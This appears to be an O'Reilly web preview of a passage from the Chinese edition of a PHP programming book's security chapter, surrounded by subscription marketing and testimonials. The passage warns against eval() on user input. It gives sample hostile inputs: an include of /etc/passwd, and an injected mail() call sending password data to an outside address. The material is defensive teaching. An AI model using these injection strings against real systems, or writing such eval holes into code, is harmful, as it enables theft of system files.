January 2021
Intermediate to advanced
505 pages
9h 45m
Chinese
Content preview from PHP编程:第4版
Become an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
O’Reilly covers everything we've got, with content to help us build a world-class technology community, upgrade the capabilities and competencies of our teams, and improve overall team performance as well as their engagement.I wanted to learn C and C++, but it didn't click for me until I picked up an O'Reilly book. When I went on the O’Reilly platform, I was astonished to find all the books there, plus live events and sandboxes so you could play around with the technology.I’ve been on the O’Reilly platform for more than eight years. I use a couple of learning platforms, but I'm on O'Reilly more than anybody else. When you're there, you start learning. I'm never disappointed.I'm always learning. So when I got on to O'Reilly, I was like a kid in a candy store. There are playlists. There are answers. There's on-demand training. It's worth its weight in gold, in terms of what it allows me to do.
328
|
第
14
章
安全
<input type="submit" name="Execute Code"/>
</form>
</body>
</html>
这个页面接受表单的任意
PHP
代码并作为脚本的一部分运行。运行代码可以访问脚本的
所有全局变量并与脚本同权限运行代码。不难看出为什么有问题——把下面的内容输入
表单
:
include("/etc/passwd");
别这么用
eval()
。这种脚本实际上没法保证安全。
可以通过在
php.ini
的
disable_functions
配置选项中列出特殊的函数以全局禁用它们,
函数名用逗号分开。例如,不需要
system()
函数,可以禁用它 :
disable_functions = system
但这不会让
evel()
更安全,因为没有方法阻止修改重要的变量或调用内建的构造,比如
echo()
调用。
在
include
、
require
、
include_once
和
require_once
的情况下,最好用
allow_url_
fopen
关闭远程文件访问。
任何使用
eval()
和
preg_replace()
的
/e
选项的代码都是危险的,尤其是你在调用中使
用“用户提供”的数据时。看下面
:
eval("2 + {$userInput}");
看起来没什么。然而,假使用户输入下面的值
:
2; mail("l33t@somewhere.com", "Some passwords", "/bin/cat /etc/passwd");
在这种情况下,你想和不想的命令都会被执行。 ...
Become an O’Reilly member and get unlimited access to this title plus top books and audiobooks from O’Reilly and nearly 200 top publishers, thousands of courses curated by job role, 150+ live events each month,
and much more.
Read now
Unlock full access
More than 5,000 organizations count on O’Reilly
O’Reilly covers everything we've got, with content to help us build a world-class technology community, upgrade the capabilities and competencies of our teams, and improve overall team performance as well as their engagement.Julian F.
I wanted to learn C and C++, but it didn't click for me until I picked up an O'Reilly book. When I went on the O’Reilly platform, I was astonished to find all the books there, plus live events and sandboxes so you could play around with the technology.Addison B.
I’ve been on the O’Reilly platform for more than eight years. I use a couple of learning platforms, but I'm on O'Reilly more than anybody else. When you're there, you start learning. I'm never disappointed.Amir M.
I'm always learning. So when I got on to O'Reilly, I was like a kid in a candy store. There are playlists. There are answers. There's on-demand training. It's worth its weight in gold, in terms of what it allows me to do.